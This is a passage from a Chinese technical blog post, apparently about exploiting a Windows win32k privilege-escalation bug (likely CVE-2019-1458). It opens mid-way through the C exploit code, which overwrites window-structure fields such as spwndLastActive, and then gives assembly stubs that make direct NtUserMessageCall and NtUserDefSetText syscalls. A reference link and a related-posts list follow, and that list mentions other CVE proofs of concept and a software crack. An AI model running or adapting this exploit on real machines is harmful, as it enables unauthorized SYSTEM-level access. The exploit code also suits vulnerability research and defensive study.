		hWndAttack, hWndVictim, ulOffset, 0, NULL);
	writeQWORD((PVOID)(spKwndAttack + SPWNDLASTACTIVE_OFFSET_IN_TAGWND), 
		hWndAttack, hWndVictim, ulOffset, 0, NULL);
	SetWindowLongPtrW(hWndAttack, ulOffset, ulOld);

	return;
}

int main(int argc, char** argv) {
	if (Init()) {
		Exploit(argv[1]);
	}else{
		printf("[!]Error: %d\n", __LINE__ - 3);
	}
    system("pause");
	return 0;
}

_TEXT SEGMENT

EXTERNDEF  g_NtUserDefSetText_syscall:dword
EXTERNDEF  g_NtUserMessageCall_syscall:dword

PUBLIC NtUserMessageCall
NtUserMessageCall PROC
    mov r10, rcx
    mov eax, g_NtUserMessageCall_syscall   
    syscall
    ret
NtUserMessageCall ENDP

NtUserDefSetText PROC
    mov r10, rcx
    mov eax, g_NtUserDefSetText_syscall
    syscall
    ret
NtUserDefSetText ENDP

_TEXT ENDS
END

0x07 演示

在这里插入图片描述

0x08 参考

https://bbs.pediy.com/thread-260268.htm#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90

飞鸿踏雪(蓝屏选手)
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2019-1458_POC:cve-2019-1458的POC
04-14
CVE-2019-1458:从``在野外报道''到POC 介绍 卡巴斯基在12月发表了一篇关于的博文。 这引起了我的兴趣,因为尽管他们描述了漏洞利用的工作方式,但他们在分析中未提供任何POC。 这就是为什么我决定尝试根据卡巴斯基的博客文章和补丁分析为该漏洞编写POC。 这篇文章描述了我这样做的过程。 信息收集: 第一件事就是尽可能多地收集有关此漏洞的信息。 通过阅读提到的博客文章,我提取了以下信息: 漏洞与窗口切换功能有关 需要模拟ALT键按下才能触发 需要对未记录的NtUserMessageCall API进行两次调用 需要创建特殊的开关窗口 曾经提到过内核函数win32k!DrawSwitchWndHilite 除此之外,还有一个不错的反编译屏幕截图,显示了先前列出的一些内容。 确切的说这表明:创作开关窗口,调用函数命名toggle_alt_key并多次调用NtUserMessa
探索Windows核心漏洞的利器:CVE-2019-1458本地权限提升攻防实践
最新发布
gitblog_00046的博客
06-17 398
探索Windows核心漏洞的利器:CVE-2019-1458本地权限提升攻防实践 项目地址:https://gitcode.com/unamer/CVE-2019-1458网络安全领域,洞悉潜在的威胁与利用它们以加强防御同等重要。今天,我们将深入探讨一个引起广泛关注的安全漏洞——CVE-2019-1458,这是一个影响多版本Windows系统的本地权限提升(LPE)漏洞。 项目介绍 CVE-2...
内网渗透之权限提升:Windows权限提升漏洞复现
balalawb的博客
10-14 228
Windows权限提升漏洞复现
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2345
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
记录
angbagangzhe065140的博客
01-29 61
二维数组的指针形式 Array[2][3]: 1> *(*(Array + i) + j) 2> *(Array + i * 行长 + j) 详见《C专家编程》 =========================分割线============================ const的后面如果紧随着一个类型说明符,const作用于类型说明符 其他情况下...
Windows GDI句柄分析
xsinlink的博客
10-18 449
我们知道,Windows 的GDI是一个单独的子系统,这个子系统中包含两个重要的东西是CSRSS进程和WIN32K驱动,由这两个模块实现所有的绘图操作,我们先看一下其中的核心之一就是WIN32K,这个模块加载的时候会调用。主要有一个好处就是Windows在应用层的时候就可以通过句柄找到GDI对象,而不需要切换到内核中,我们知道切换到内核是需要一定的资源消耗的,因此使用这种方式可以提升一定的速度。不同的进程,对应的GDI对象的句柄是一样的,因此GDI对象不同于内核对象,完全可以跨进程使用。
windows message manager
飞鸟的专栏
08-31 1515
SendMessage窗口过程函数的调用有两个入口,一个是自己的线程给自己窗口发通知,这样直接调用内部函数进行调用,使用IntCallMessageProc来调用函数,另一种方式是转换用户消息为内核消息,调用NtUserMessageCall来传递消息。LRESULT WINAPI SendMessageW(HWND Wnd, UINT Msg, WPARAM wParam
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-7238.py
10-25
# CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication [@voidfyoo](https://twitter.com/voidfyoo)
CVE-2019-0708检测与修复补丁CVE-2019-0708检测与修复补丁
06-05
CVE-2019-0708检测与修复补丁 下载链接
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
cve-2019-11477.rar
06-20
此漏洞只支持本地检测,不支持远程检测模式,检测成功率很高,可以排查网络资产中是否存在此问题,避免此漏洞造成的DoS 问题
驱动编程:注册表回调,进程回调,文件回调,进程隐藏断链,窗口保护
追逐光芒,追随内心
10-28 1800
#include "struct.h" #define debug_pott_offset 0x298 //#define debug_pott_offset 0x1f0 DWORD changge_size_NtClose = 0; //NtClose被修改了N字节 PUCHAR ori_head_NtClose = NULL; //NtClose的前N字节数组 PVOID ori_addr_NtClose = NULL; //NtCl..
通过符号表找到系统未导出的函数地址源码
05-16 1719
作 者: FlyToTheSpace说明:第一步设置符号表路径.比如 E:/WINDOWS/system32/Symbols/第二步指定系统动态库,比如user32.dll第三步指定系统库函数名比如ValidateHwnd.如果调用成功的话,返回值就为未导出的库函数地址.例外说明.使用ollydbg设置好了符号表路径,好像是没有效果.只有把符号文件放到系统目录/system32/symbols/里
windbg环境
weixin_30511039的博客
04-16 178
安装与配置windbg的symbol(符号) 第一步下载WinDBG 请通过此链接下载Web安装版的Windows SDK: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6b6c21d2-2006-4afa-9702-529fa782d63b&displaylang=en ...
刚刚修复的Windows 0day和Chrome 0day 已被组合用于 WizardOpium 攻击(详解)
smellycat000的专栏
12-11 426
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队微软在刚刚发布的12月“补丁星期二”中共修复36个漏洞,其中含一个已遭利用的 Windows 0day (CVE-2019-...
CVE-2019-14287复现
weixin_42298807的博客
10-28 1190
一、 漏洞成因 管理员在sudo配置文档中用了ALL关键字造成的。 sudo权限绕过漏洞,sudo,Linux系统管理命令,允许用户在不切换环境的前提下,以其他用户的权限运行应用程序或命令。 二、 影响版本 1.8.28之前的所有版本 三、 漏洞复现 1、 查看sudo版本 sudo -V 2、 新建账户 useradd test passwd test 3、 修改sudo配置文件 vim /e...
二、漏洞编号为CVE-2019-7304的本地提权(略微详细)(Ubuntu16.04.4)
qwsn
10-13 3500
CVE-2019-7304漏洞的本地提权 一、漏洞分析 1.CVE-2019-7304是什么漏洞? 答:用户任何普通用户本地提权的漏洞。 2.该漏洞实际上做了什么? 答:实际是在/etc/passwd中加入了一个用户,不过可以使用sudo命令,行使管理员root的权限。 3.CVE-2019-7304利用的是? 答:linux的Ubuntu服务器安装时,默认安装的“snap”服务的错误,具体是...
01Editor最新破解
qq_41252520的博客
12-30 9669
注册的提示信息还有界面的提示信息很丰富,这为我们定位关键代码提供了充分的线索。此函数条件为真的分支存在多对1情况,导致逆函数不能保证得到正确的原函数输入,而原函数的输入在后面验证的时候还需要用到。因此,这个函数的逆函数没有意义。在满足条件3、6和7,就能确定hb中的所有元素,然后反求得serial。注意:这个函数是多对一的,所以这个函数的反函数就成了一对多。以上就是所有注册算法流程,接下来考虑如何获得正确的任意用户名的序列号。因为有处条件永不满足。,用来和序列号某个部分进行对比的,所以该函数也不用求逆。
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞是 CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值